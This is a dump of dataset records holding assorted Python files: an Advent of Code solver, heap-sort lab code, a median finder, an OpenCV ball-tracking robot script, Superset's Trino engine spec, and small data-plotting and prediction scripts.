vector_asteroids.append((vector, asteroid, declive))\n    vector_asteroids.sort(key=lambda k: k[2])\n    for vector, ast, _ in vector_asteroids:\n        if vector.x >= 0 and vector.y < 0:\n            yield ast\n    for vector, ast, _ in vector_asteroids:\n        if vector.x > 0 and vector.y >= 0:\n            yield ast\n    for vector, ast, _ in vector_asteroids:\n        if vector.x <= 0 and vector.y > 0:\n            yield ast\n    for vector, ast, _ in vector_asteroids:\n        if vector.x < 0 and vector.y <= 0:\n            yield ast\n\n\n@timer\ndef part1():\n    \"\"\"Solve challenge part 1.\"\"\"\n    return best_location()[1]\n\n\n@timer\ndef part2():\n    \"\"\"Solve challenge part 2.\"\"\"\n    destroy_goal = 200\n    m_station = best_location()[0]\n    existing_asteroids = set(ASTEROIDS)\n    detected_asteroids = get_detected_asteroids(existing_asteroids, m_station)\n    destroyed = 0\n    while detected_asteroids:\n        for ast in order_asteroids(m_station, detected_asteroids):\n            destroyed += 1\n            if destroyed == destroy_goal:\n                return ast.x * 100 + ast.y\n            existing_asteroids.remove(ast)\n        detected_asteroids = get_detected_asteroids(existing_asteroids, m_station)\n    raise Exception(f\"Not enough asteroids destroyed. ({destroyed}/{destroy_goal})\")\n\n\nif __name__ == \"__main__\":\n    print(part1())\n    print(part2())\n","sub_path":"aoc10.py","file_name":"aoc10.py","file_ext":"py","file_size_in_byte":3284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"144388602","text":"\"\"\"\nRicky Cheah\n6/13/2020\n\nCSC 255 - Lab 1\n\"\"\" \ndef main():\n    # This tests in1.txt until in7.txt\n    for i in range(1,8):\n        print(SumOfK(f'in{i}.txt',f'out{i}.txt'))\n        print(\"_\"*55)\n\ndef SumOfK(inFileName, outFileName):\n    '''\n    1. This function accepts a file \"inFileName\".\n    2. Filters out non-digit characters, and inserts the numbers into a list.\n    3. First number in the list is popped out to be a \"target\".\n    4. The remaining list is sorted in ascending order using heapSort() at O(nlog(n)).\n    5. The sorted list is searched in an O(n) fashion using two pointers, to find if \n    any two numbers or the double of a single number sum up to the \"target\".\n    6. 
The results are written into a new file \"outFileName\".\n \n * Duplicate results are omitted *\n '''\n print(f\"Input file = {inFileName}, Output file = {outFileName}.\\n\")\n f = open(inFileName, 'r')\n fileRows = f.readlines()\n f.close()\n \n outputRows = \"\"\n for row in fileRows:\n for ch in row.rstrip(): # rstrip() removes \\n at the end of a row\n if ch.isalpha(): # isalpha() returns true if a character is an alphabet\n break\n else: # if we did not break out of the inner for loop, this else is executed\n if row.strip(): # this filters out empty rows\n outputRows += row\n\n numberList = [int(x) for x in outputRows.split()] # converting string to list of int\n try:\n target = numberList.pop(0) # getting the \"target\"\n except:\n print(\"There are no numbers in the file.\")\n return f\"SumOfK({inFileName}, {outFileName}) failed.\"\n \n \n sortedList = heapSort(numberList)\n outputRows += \" \".join(map(str, sortedList)) +\"\\n\" # will be written to output file\n g = open(outFileName, 'w')\n for row in outputRows:\n print(row, end='') # printing output\n g.write(row) \n \n outputRows = \"\" # reset outputRows \n foundSolution = False # Keep tracking of if we found solution\n\n # Initialize the 2 pointers\n pointer1 = 0\n pointer2 = len(sortedList)-1\n \n # Initialize the repeat number catcher\n previousNumber1 = None\n previousNumber2 = None\n \n # Iterate over numbers with pointers looking for sum == target\n while pointer2>pointer1:\n if previousNumber1 == sortedList[pointer1]: #skips repeat number\n pointer1 += 1\n continue # restarts while loop after moving pointer \n elif previousNumber2 == sortedList[pointer2]: #skips repeat number\n pointer2 -= 1\n continue \n else:\n if sortedList[pointer1]*2 == target: # found a number x 2 == target\n foundSolution = True\n outputRows += f\"{sortedList[pointer1]}+{sortedList[pointer1]}\\n\"\n previousNumber1 = sortedList[pointer1]\n pointer1 += 1\n continue\n elif sortedList[pointer2]*2 == target: # found a number x 2 == target\n foundSolution = True\n outputRows += f\"{sortedList[pointer2]}+{sortedList[pointer2]}\\n\"\n previousNumber2 = sortedList[pointer2]\n pointer2 -= 1\n continue\n elif sortedList[pointer1] + sortedList[pointer2] > target: # no match\n pointer2 -= 1\n continue\n elif sortedList[pointer1] + sortedList[pointer2] < target: # no match\n pointer1 += 1\n continue\n else: # found sum of two numbers == target\n foundSolution = True\n outputRows += f\"{sortedList[pointer1]}+{sortedList[pointer2]}\\n\"\n pointer2 -= 1\n pointer1 += 1\n\n if foundSolution:\n outputRows = \"Yes\\n\" + outputRows\n else:\n outputRows = \"No\\n\" + outputRows\n \n # Finish writing to output file.\n for row in outputRows:\n g.write(row)\n g.close()\n print(outputRows)\n \n return f\"Heapsort Version SumOfK({inFileName}, {outFileName}) complete.\"\n\n\ndef maxHeap(array, size, startIndex):\n '''\n array = name of array/list\n size = size of array to max-heapify\n startIndex = Index of array to max-heapify\n \n This function uses recursion to create a Max Heap\n '''\n\n largestIntIndex = startIndex # the parent node we are investigating\n leftIndex = 2*startIndex + 1 # left child index\n rightIndex = 2*startIndex + 2 # right child index\n \n if size > leftIndex and array[leftIndex] > array[largestIntIndex]:\n largestIntIndex = leftIndex\n\n if size > rightIndex and array[rightIndex] > array[largestIntIndex]:\n largestIntIndex = rightIndex\n\n if largestIntIndex != startIndex: # swapping parent node with largest child\n array[largestIntIndex], 
array[startIndex] = array[startIndex], array[largestIntIndex]\n        \n        # after swapping, we now check the child that we swapped, as the parent\n        maxHeap(array, size, largestIntIndex) \n        \ndef heapSort(array):\n    '''\n    array = name of array to be sorted\n    \n    Making use of the maxHeap function, this function sorts an array in ascending order.\n    O(nlog(n))\n    '''\n    size = len(array)\n    startIndex = size//2 - 1 # this finds start of the non-leaf indexes\n    \n    # This builds the first Max Heap\n    for i in range(startIndex, -1, -1): \n        maxHeap(array, size, i)\n    \n    # This 'deletes' the largest number from the heap each time and stores it in the last index\n    for i in range(size-1, 0, -1):\n        array[i], array[0] = array[0], array[i] # swaps root (largest) with last leaf\n        maxHeap(array, i, 0) # remake the Max Heap\n    return array\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"csc255/Lab1_Cheah/Lab1_Cheah.py","file_name":"Lab1_Cheah.py","file_ext":"py","file_size_in_byte":5729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"131451850","text":"# Heap sort application:\n# design a data structure that dynamically maintains a set of values and supports:\n# (1) adding an element\n# (2) returning the median of the current values: findMedian()\n\ndef build_maxheap(list):\n    heapSize = len(list)\n    if heapSize < 2:\n        return\n    for i in range(int(heapSize/2)-1, -1, -1):\n        maxHeapify(list, heapSize, i)\n\ndef build_minheap(list):\n    heapSize = len(list)\n    if heapSize < 2:\n        return\n    for i in range(int(heapSize/2)-1, -1, -1):\n        minHeapify(list, heapSize, i)\n\ndef maxHeapify(list, heapSize, i):\n    left = 2 * i + 1\n    right = left + 1\n    maxIndex = i\n    if left < heapSize:\n        if list[left] > list[i]:\n            maxIndex = left\n    if right < heapSize and list[maxIndex] < list[right]:\n        maxIndex = right\n    if maxIndex != i:\n        list[maxIndex], list[i] = list[i], list[maxIndex]\n        maxHeapify(list, heapSize, maxIndex)\n\ndef minHeapify(list, heapSize, i):\n    left = 2 * i + 1\n    right = left + 1\n    minIndex = i\n    if left < heapSize:\n        if list[left] < list[i]:\n            minIndex = left\n    if right < heapSize and list[minIndex] > list[right]:\n        minIndex = right\n    if minIndex != i:\n        list[minIndex], list[i] = list[i], list[minIndex]\n        minHeapify(list, heapSize, minIndex)\n\ndef min_max_Heap(a, b, list):\n    a.append(list.pop(0))\n    b.append(list.pop(0))\n    while (len(list)):\n        data = list.pop(0)\n        if a[0] < data:\n            b.append(data)\n            build_minheap(b)\n        else:\n            a.append(data)\n            build_maxheap(a)\n        if a[0] > b[0]:\n            b[0], b[-1] = b[-1], b[0]\n            a.append(b.pop())\n            build_maxheap(a)\n            build_minheap(b)\n        if abs(len(a) - len(b)) > 1:\n            if len(a) > len(b):\n                a[0], a[-1] = a[-1], a[0]\n                b.append(a.pop())\n                build_maxheap(a)\n                build_minheap(b)\n            else:\n                b[0], b[-1] = b[-1], b[0]\n                a.append(b.pop())\n                build_maxheap(a)\n                build_minheap(b)\n\ndef find_median(list):\n    a = []\n    b = []\n    min_max_Heap(a, b, list)\n    if len(a) == len(b):\n        return (a[0], b[0])\n    elif len(a) > len(b):\n        return a[0]\n    else:\n        return b[0]\n\n\nlist = [2, 1, 6, 0, 4, 8, 12, 3, 7]\nb = find_median(list)\nprint(b)\n\n\n\n    \n\n    \n\n\n\n\n\n","sub_path":"dir_sort/find_median.py","file_name":"find_median.py","file_ext":"py","file_size_in_byte":2423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
{"seq_id":"356725664","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 17 17:09:49 2018\r\n\r\n@author: ntdx\r\n\"\"\"\r\n#import plot\r\nimport scipy.misc\r\nimport numpy as np\r\n\r\n\r\ndef imread(path, grayscale = False):\r\n    if (grayscale):\r\n        return scipy.misc.imread(path, flatten = True).astype(np.float)\r\n    else:\r\n        
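# note: scipy.misc.imread was deprecated in SciPy 1.0 and removed in 1.2;\r\n        # imageio.imread is the usual drop-in replacement on newer installs\r\n        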
return scipy.misc.imread(path).astype(np.float)\r\n\r\ndef rgb2gray(rgb):\r\n return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])\r\n\r\ndef width(lst):\r\n i=0\r\n for j in lst[0]:\r\n i=i+1\r\n return i\r\ndef AutoNorm(mat): \r\n n=len(mat)\r\n m= width(mat) \r\n MinNum=[9999999999]*m\r\n MaxNum = [0]*m \r\n for i in mat:\r\n for j in range(0,m):\r\n if i[j]>MaxNum[j]:\r\n MaxNum[j]=i[j]\r\n \r\n for p in mat: \r\n for q in range(0,m):\r\n if p[q]<=MinNum[q]:\r\n MinNum[q]=p[q] \r\n \r\n section=list(map(lambda x: x[0]-x[1], zip(MaxNum, MinNum)))\r\n #print section\r\n NormMat=[]\r\n \r\n for k in mat: \r\n \r\n distance=list(map(lambda x: x[0]-x[1], zip(k, MinNum)))\r\n value=list(map(lambda x: x[0]/x[1], zip(distance,section)))\r\n NormMat.append(value) \r\n return NormMat","sub_path":"tflib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"513553269","text":"import numpy as np\nimport imutils\nimport cv2\nimport time\n# import matplotlib.pyplot as plt\n\nclass bolaProcessing():\n\n try:\n def nothing(x):\n pass\n\n cv2.namedWindow('color_threshold')\n cv2.createTrackbar('b_low', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('g_low', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('r_low', 'color_threshold', 0, 255, nothing)\n \n cv2.createTrackbar('b_high', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('g_high', 'color_threshold', 0, 255, nothing)\n cv2.createTrackbar('r_high', 'color_threshold', 0, 255, nothing)\n\n def __init__(self):\n # self.img = cv2.imread(img_Name)\n # self.camera = cv2.VideoCapture('D:\\NyeMan\\KULIAH\\Robotiik\\KRSBI BERODA\\Robot\\camera\\contoh_robot.mp4')\n #size(frame, width=600)\n # self.height, self.width, self.depth = self.img.shape\n self.color_upper = None\n self.color_lower = None\n self.mask = None\n # self.newPos = [0,0]\n self.oldPos = [0,0]\n self.luas = 0\n # self.width = 600\n self.titik_tengah = (159, 119)\n self.param_X = range(109, 209)\n self.param_Y = range(69, 169)\n self.waktu_awal = 0\n self.waktu_akhir = 0\n\n\n def prepareCamera(self):\n self.camera = cv2.VideoCapture(0)\n self.camera.isOpened()\n self.camera.set(3, 320)\n self.camera.set(4, 240)\n (grabbed, frame) = self.camera.read()\n # self.width = 600\n self.img = frame\n\n def getCamera(self):\n (grabbed, frame) = self.camera.read()\n self.img = frame\n # self.img = imutils.resize(frame, width=self.width)\n #if(self.img is None):\n # self.prepareCamera()\n # self.blurred = self.img.copy()\n self.waktu_awal = time.time()\n\n def getValueColor(self):\n R_LOW = cv2.getTrackbarPos('r_low', 'color_threshold')\n G_LOW = cv2.getTrackbarPos('g_low', 'color_threshold')\n B_LOW = cv2.getTrackbarPos('b_low', 'color_threshold')\n R_HIGH = cv2.getTrackbarPos('r_high', 'color_threshold')\n G_HIGH = cv2.getTrackbarPos('g_high', 'color_threshold')\n B_HIGH = cv2.getTrackbarPos('b_high', 'color_threshold')\n self.color_lower = np.array([B_LOW, G_LOW, R_LOW])\n self.color_upper = np.array([B_HIGH, G_HIGH, R_HIGH])\n #self.color_lower = np.array([3, 140, 187])\n #self.color_upper = np.array([231, 231, 255])\n\n def binaryThres(self):\n self.thresh = cv2.threshold(self.blurred, 60, 255, cv2.THRESH_BINARY)[1]\n \n def displayMask(self):\n cv2.imshow('mask', self.mask)\n \n \n def displayImg(self):\n #cv2.line(self.img, self.titik_tengah, self.param_X, (0,255,0), 2)\n #cv2.line(self.img, self.titik_tengah, self.param_Y, (0,255,0), 2)\n 
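# titik_tengah (the center point) is roughly the middle of the 320x240 frame;\n        # the param_X/param_Y ranges define the dead zone that getAction below\n        # treats as the ball being centered\n        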
cv2.imshow('Img', self.img)\n\n def displayImgCopy(self):\n #cv2.circle(self.imgCopy, (159,119), 7, (255, 0, 80), -1)\n #cv2.circle(self.imgCopy, (69,169), 7, (90, 255 ,60), -1)\n #cv2.circle(self.imgCopy, (159,119), 7, (0, 100, 255), -1)\n cv2.imshow('ImgCopy', self.imgCopy) \n \n def displayBinaryThresh(self):\n cv2.imshow('Binary', self.thresh)\n\n def maskProcessing(self):\n self.hsv = cv2.cvtColor(self.img, cv2.COLOR_BGR2HSV)\n # self.gray = cv2.cvtColor(self.img, cv2.COLOR_BGR2GRAY)\n #img = cv2.GaussianBlur(self.hsv, (5, 5), 1)\n self.blurred = cv2.blur(self.hsv,(5,5))\n #self.blurred = cv2.medianBlur(self.hsv,10)\n kernel = np.ones((5,5),np.uint8)\n mask = cv2.inRange(self.hsv, self.color_lower, self.color_upper)\n opening = cv2.morphologyEx(mask, cv2.MORPH_OPEN, kernel)\n self.mask = cv2.morphologyEx(opening, cv2.MORPH_CLOSE, kernel)\n # self.mask = cv2.Canny(self.img,self.thr_canny1,self.thr_canny2)\n \n\n def stopProg(self):\n key = cv2.waitKey(1) & 0xFF\n if key == ord(\"q\"):\n cv2.destroyAllWindows()\n return 0\n else:\n return 1\n \n\n def findContour(self):\n self.contours = cv2.findContours(self.mask.copy(),cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)\n self.cnts = self.contours[0] if imutils.is_cv2() else self.contours[1]\n\n def drawContour(self, c):\n cv2.drawContours(self.imgCopy,self.cnts,-1,(0,255,255),-1)\n\n def findCenterPoint(self):\n self.imgCopy = self.img.copy()\n Temp = 0\n M = 0\n \n for c in self.cnts:\n area = cv2.contourArea(c)\n if( Temp < area):\n Temp = area\n self.cnts = c\n M = cv2.moments(c)\n if self.luas ==0 and len(self.cnts)>0:\n self.luas = cv2.contourArea(self.cnts)\n if M != 0:\n if M[\"m00\"] != 0:\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n else:\n cX, cY = 0, 0\n # self.newPos = [cX, cY]\n self.getDirection([cX, cY], cv2.contourArea(self.cnts))\n # self.oldPos = [cX, cY]\n # self.getJarak(M[\"m00\"])\n self.getAction()\n cv2.drawContours(self.imgCopy,self.cnts,-1,(0,255,255),-1)\n cv2.circle(self.imgCopy, (cX, cY), 7, (200, 200, 160), -1)\n #cv2.putText(self.imgCopy, \"center\", (cX - 20, cY - 20),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (120, 120, 120), 2)\n\n \n def getAction(self):\n \n if(self.oldPos[0] in self.param_X and self.oldPos[1] in self.param_Y):\n print (\"sudah ditengah\")\n return [0,0]\n else:\n if self.oldPos[0] < self.titik_tengah[0]-50 and self.oldPos[1] < self.titik_tengah[1]-50:\n print (\"bola di pojok kiri atas - robot gerak ke kiri kemudian maju\")\n return [-1,1]\n elif self.oldPos[0] < self.titik_tengah[0]-50 and self.oldPos[1] > self.titik_tengah[1]+50:\n print (\"bola di pojok kiri bawah - robot gerak ke kiri kemudian mundur\")\n return [-1,-1]\n elif self.oldPos[0] > self.titik_tengah[0]+50 and self.oldPos[1] > self.titik_tengah[1]+50:\n print (\"bola di pojok kanan bawah - robot gerak ke kanan kemudian mundur\")\n return [1,-1]\n elif self.oldPos[0] > self.titik_tengah[0]+50 and self.oldPos[1] < self.titik_tengah[1]-50:\n print (\"bola di pojok kanan atas - robot gerak ke kanan kemudian maju\")\n return [1,1]\n elif self.oldPos[0] < self.titik_tengah[0]-50 and self.oldPos[1] in self.param_Y:\n print (\"bola di kiri - robot gerak ke kiri\")\n return [-1,0]\n elif self.oldPos[0] > self.titik_tengah[0]+50 and self.oldPos[1] in self.param_Y:\n print (\"bola di kanan - robot gerak ke kanan\")\n return [1,0]\n elif self.oldPos[0] in self.param_X and self.oldPos[1] < self.titik_tengah[1]-50:\n print (\"bola di atas - robot gerak maju\")\n return [0,1]\n elif self.oldPos[0] in self.param_X and 
self.oldPos[1] > self.titik_tengah[1]+20:\n print (\"bola di bawah - robot gerak mundur\")\n return [0,-1]\n\n def getPosition(self):\n print(self.newPos)\n\n def getReadyKick(self):\n if( self.newPos[0] <= int(self.width/2 + 15) and self.newPos[0] >= int(self.width/2 - 15) ):\n print(\"Kick!!\")\n else:\n print(\"Don't kick yet!!\")\n\n def getDirection(self, newPos, candidateLuas):\n # pos_TEMP = [self.oldPos[0] - self.newPos[0], self.oldPos[1] - self.newPos[1]]\n self.waktu_akhir = time.time()\n pos_TEMP = [self.oldPos[0] - newPos[0], self.oldPos[1] - newPos[1]]\n selisih = ((pos_TEMP[0]*(0.1))**2+(pos_TEMP[1]*(0.1))**2)**(0.5)\n kec = selisih/(self.waktu_akhir-self.waktu_awal)\n print(\"kecepatan : \",kec) \n if(pos_TEMP[0] > 0 and pos_TEMP[1]>0):\n print( \"gerak ke kiri atas\")\n elif (pos_TEMP[0] < 0 and pos_TEMP[1]<0):\n print( \"gerak ke kanan bawah\")\n elif (pos_TEMP[0] > 0 and pos_TEMP[1]<0):\n print( \"gerak ke kiri bawah\")\n elif (pos_TEMP[0] < 0 and pos_TEMP[1]>0):\n print( \"gerak ke kanan atas\")\n elif (pos_TEMP[0] < 0 and pos_TEMP[1]==0):\n print( \"gerak ke kanan\")\n elif (pos_TEMP[0] > 0 and pos_TEMP[1]==0):\n print( \"gerak ke kiri\")\n elif (pos_TEMP[0] == 0 and pos_TEMP[1]>0):\n print( \"gerak ke atas\")\n elif (pos_TEMP[0] == 0 and pos_TEMP[1]<0):\n print( \"gerak ke bawah\")\n else:\n print( \"Diam\")\n if self.luas > candidateLuas:\n #cv2.putText(self.imgCopy, \"menjauh\", (100, 100),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 200), 2)\n print(\"menjauh\")\n else :\n print(\"mendekat\")\n #cv2.putText(self.imgCopy, \"mendekat\", (100, 100),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 200), 2)\n self.luas = candidateLuas\n self.oldPos = newPos\n #cv2.putText(self.imgCopy, direction, (20, 20),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (120, 120, 120), 2)\n\n except:\n print (\"camera error\")\n\n","sub_path":"Beroda/bolaProcessing.py","file_name":"bolaProcessing.py","file_ext":"py","file_size_in_byte":10034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"284533467","text":"from . 
import web\nfrom flask import render_template,request,redirect,url_for,flash\n\nlist1 = [{\"a\":1,\"b\":2},{\"a\":3,\"b\":4}]\n\n@web.route('/test',methods=['get','post'])\ndef Test():\n for i in list1:\n print(i['a'],i['b'])\n return \"test\"\n ","sub_path":"app/web/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"350720336","text":"import xgboost as xgb\nimport pickle\nimport pandas as pd\nimport os\n\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\nmodel = pickle.load(open(\"xgb_model.pickle\", \"rb\"))\n\ntestset_X = pd.read_csv(BASE_DIR + '/processed/X_test_processed.csv')\n\ntestset_X = testset_X.drop(\"(紹介予定)雇用形態備考_アルバイト社員\", axis=1)\n\ntest_X = testset_X.iloc[:, 1:].values\n\ntestset = xgb.DMatrix(test_X)\nmy_pred = pd.DataFrame()\nmy_pred[\"お仕事No.\"] = testset_X.iloc[:, 0]\nmy_pred[\"応募数 合計\"] = model.predict(testset)\nmy_pred.to_csv(BASE_DIR + '/final_result/final_result.csv', index=False)\n\n\n","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"330063948","text":"a=eval(input(\"enter any number to check perfect or not\"))\ni=1\n\nn=a\nsum=0\nwhile i Optional[str]:\n \"\"\"\n Convert a Python `datetime` object to a SQL expression.\n\n :param target_type: The target type of expression\n :param dttm: The datetime object\n :param db_extra: The database extra object\n :return: The SQL expression\n\n Superset only defines time zone naive `datetime` objects, though this method\n handles both time zone naive and aware conversions.\n \"\"\"\n tt = target_type.upper()\n if tt == utils.TemporalType.DATE:\n return f\"DATE '{dttm.date().isoformat()}'\"\n if tt in (\n utils.TemporalType.TIMESTAMP,\n utils.TemporalType.TIMESTAMP_WITH_TIME_ZONE,\n ):\n return f\"\"\"TIMESTAMP '{dttm.isoformat(timespec=\"microseconds\")}'\"\"\"\n return None\n\n @classmethod\n def epoch_to_dttm(cls) -> str:\n return \"from_unixtime({col})\"\n\n @classmethod\n def adjust_database_uri(\n cls, uri: URL, selected_schema: Optional[str] = None\n ) -> None:\n database = uri.database\n if selected_schema and database:\n selected_schema = parse.quote(selected_schema, safe=\"\")\n database = database.split(\"/\")[0] + \"/\" + selected_schema\n uri.database = database\n\n @classmethod\n def update_impersonation_config(\n cls,\n connect_args: Dict[str, Any],\n uri: str,\n username: Optional[str],\n ) -> None:\n \"\"\"\n Update a configuration dictionary\n that can set the correct properties for impersonating users\n :param connect_args: config to be updated\n :param uri: URI string\n :param username: Effective username\n :return: None\n \"\"\"\n url = make_url_safe(uri)\n backend_name = url.get_backend_name()\n\n # Must be Trino connection, enable impersonation, and set optional param\n # auth=LDAP|KERBEROS\n # Set principal_username=$effective_username\n if backend_name == \"trino\" and username is not None:\n connect_args[\"user\"] = username\n\n @classmethod\n def modify_url_for_impersonation(\n cls, url: URL, impersonate_user: bool, username: Optional[str]\n ) -> None:\n \"\"\"\n Modify the SQL Alchemy URL object with the user to impersonate if applicable.\n :param url: SQLAlchemy URL object\n :param impersonate_user: Flag indicating if impersonation is enabled\n :param username: Effective username\n \"\"\"\n # Do nothing and let 
update_impersonation_config take care of impersonation\n\n @classmethod\n def get_allow_cost_estimate(cls, extra: Dict[str, Any]) -> bool:\n return True\n\n @classmethod\n def estimate_statement_cost(cls, statement: str, cursor: Any) -> Dict[str, Any]:\n \"\"\"\n Run a SQL query that estimates the cost of a given statement.\n\n :param statement: A single SQL statement\n :param cursor: Cursor instance\n :return: JSON response from Trino\n \"\"\"\n sql = f\"EXPLAIN (TYPE IO, FORMAT JSON) {statement}\"\n cursor.execute(sql)\n\n # the output from Trino is a single column and a single row containing\n # JSON:\n #\n # {\n # ...\n # \"estimate\" : {\n # \"outputRowCount\" : 8.73265878E8,\n # \"outputSizeInBytes\" : 3.41425774958E11,\n # \"cpuCost\" : 3.41425774958E11,\n # \"maxMemory\" : 0.0,\n # \"networkCost\" : 3.41425774958E11\n # }\n # }\n result = json.loads(cursor.fetchone()[0])\n return result\n\n @classmethod\n def query_cost_formatter(\n cls, raw_cost: List[Dict[str, Any]]\n ) -> List[Dict[str, str]]:\n \"\"\"\n Format cost estimate.\n\n :param raw_cost: JSON estimate from Trino\n :return: Human readable cost estimate\n \"\"\"\n\n def humanize(value: Any, suffix: str) -> str:\n try:\n value = int(value)\n except ValueError:\n return str(value)\n\n prefixes = [\"K\", \"M\", \"G\", \"T\", \"P\", \"E\", \"Z\", \"Y\"]\n prefix = \"\"\n to_next_prefix = 1000\n while value > to_next_prefix and prefixes:\n prefix = prefixes.pop(0)\n value //= to_next_prefix\n\n return f\"{value} {prefix}{suffix}\"\n\n cost = []\n columns = [\n (\"outputRowCount\", \"Output count\", \" rows\"),\n (\"outputSizeInBytes\", \"Output size\", \"B\"),\n (\"cpuCost\", \"CPU cost\", \"\"),\n (\"maxMemory\", \"Max memory\", \"B\"),\n (\"networkCost\", \"Network cost\", \"\"),\n ]\n for row in raw_cost:\n estimate: Dict[str, float] = row.get(\"estimate\", {})\n statement_cost = {}\n for key, label, suffix in columns:\n if key in estimate:\n statement_cost[label] = humanize(estimate[key], suffix).strip()\n cost.append(statement_cost)\n\n return cost\n\n @staticmethod\n def get_extra_params(database: \"Database\") -> Dict[str, Any]:\n \"\"\"\n Some databases require adding elements to connection parameters,\n like passing certificates to `extra`. 
This can be done here.\n\n :param database: database instance from which to extract extras\n :raises CertificateException: If certificate is not valid/unparseable\n \"\"\"\n extra: Dict[str, Any] = BaseEngineSpec.get_extra_params(database)\n engine_params: Dict[str, Any] = extra.setdefault(\"engine_params\", {})\n connect_args: Dict[str, Any] = engine_params.setdefault(\"connect_args\", {})\n\n if database.server_cert:\n connect_args[\"http_scheme\"] = \"https\"\n connect_args[\"verify\"] = utils.create_ssl_cert_file(database.server_cert)\n\n return extra\n\n @staticmethod\n def update_encrypted_extra_params(\n database: \"Database\", params: Dict[str, Any]\n ) -> None:\n if not database.encrypted_extra:\n return\n try:\n encrypted_extra = json.loads(database.encrypted_extra)\n auth_method = encrypted_extra.pop(\"auth_method\", None)\n auth_params = encrypted_extra.pop(\"auth_params\", {})\n if not auth_method:\n return\n\n connect_args = params.setdefault(\"connect_args\", {})\n connect_args[\"http_scheme\"] = \"https\"\n # pylint: disable=import-outside-toplevel\n if auth_method == \"basic\":\n from trino.auth import BasicAuthentication as trino_auth # noqa\n elif auth_method == \"kerberos\":\n from trino.auth import KerberosAuthentication as trino_auth # noqa\n elif auth_method == \"jwt\":\n from trino.auth import JWTAuthentication as trino_auth # noqa\n else:\n allowed_extra_auths = current_app.config[\n \"ALLOWED_EXTRA_AUTHENTICATIONS\"\n ].get(\"trino\", {})\n if auth_method in allowed_extra_auths:\n trino_auth = allowed_extra_auths.get(auth_method)\n else:\n raise ValueError(\n f\"For security reason, custom authentication '{auth_method}' \"\n f\"must be listed in 'ALLOWED_EXTRA_AUTHENTICATIONS' config\"\n )\n\n connect_args[\"auth\"] = trino_auth(**auth_params)\n except json.JSONDecodeError as ex:\n logger.error(ex, exc_info=True)\n raise ex\n","sub_path":"superset/db_engine_specs/trino.py","file_name":"trino.py","file_ext":"py","file_size_in_byte":9866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"384861468","text":"from dragon import Dragon\n\n\nSERVER = \"52.79.237.101\"\n\n\ndef main():\n sock = Dragon(SERVER, 6000)\n sock.bind(('', 7000))\n\n data = b''\n\n while True:\n try:\n tmp = sock.recv(1500)\n except KeyboardInterrupt:\n open(\"dragon_recv_frame\", \"wb\").write(data)\n break\n if not tmp:\n break\n data += tmp\n\n # sock.send(b'Hello world!')\n\n sock.close()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"427445239","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jan 20 00:27:27 2021\nSQLite + panda - https://datacarpentry.org/python-ecology-lesson/09-working-with-sql/index.html\nhttps://towardsdatascience.com/python-pandas-and-sqlite-a0e2c052456f\n\n@author: Eilham\n\"\"\"\n\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport sqlite3\nplt.style.use('seaborn') \n\n#==============SQLITE setup/connection =======================================\n\n# creating connection with existing table\nconn = sqlite3.connect('test_9.db')\n\n\n\n# creating panda dataFrame from table\ndf = pd.read_sql_query('SELECT * FROM SENSOR_TABLE', conn)\n\n# taking column 'time, accel' from database and assigning it onto a variable\ntime = df['TIME']\naccel_x = df['ACCEL_X']\naccel_y = df['ACCEL_Y']\naccel_z = df['ACCEL_Z']\n\n# 
setting up subplots ( 3 rows and 1 column)\nfig, (ax1, ax2, ax3) = plt.subplots(nrows = 3 , ncols = 1)\n\n# plotting the points and adding artistic stuff\nax1.plot(time, accel_x, color='b', linewidth = 1, label= 'x-axis')\nax2.plot(time, accel_y, color='g', linewidth = 1, label = 'y-axis')\nax3.plot(time, accel_z, color='r', linewidth = 1, label = 'z-axis')\n\n#===========SUBPLOT #1 ====================================================\n\n# enabling legends\nax1.legend()\n\n\n# label x and y axis\nax1.set_xlabel('Time (hh:mm:ss)')\nax1.set_ylabel('Accelerometer')\n\n# put the title\nax1.set_title('Accelerometer Readings')\n\n#===========SUBPLOT #2 ====================================================\n# enabling legends\nax2.legend()\n\n\n# label x and y axis\nax2.set_xlabel('Time (hh:mm:ss)')\nax2.set_ylabel('Accelerometer')\n\n# put the title\nax2.set_title('Accelerometer Readings')\n\n#===========SUBPLOT #3 ====================================================\n# enabling legends\nax3.legend()\n\n\n# label x and y axis\nax3.set_xlabel('Time (hh:mm:ss)')\nax3.set_ylabel('Accelerometer')\n\n# put the title\nax3.set_title('Accelerometer Readings')\n\n\n\n\n# enable grid (although seaborn already has a grid)\n#plt.grid(True)\n\n# tight layout to keep the shape 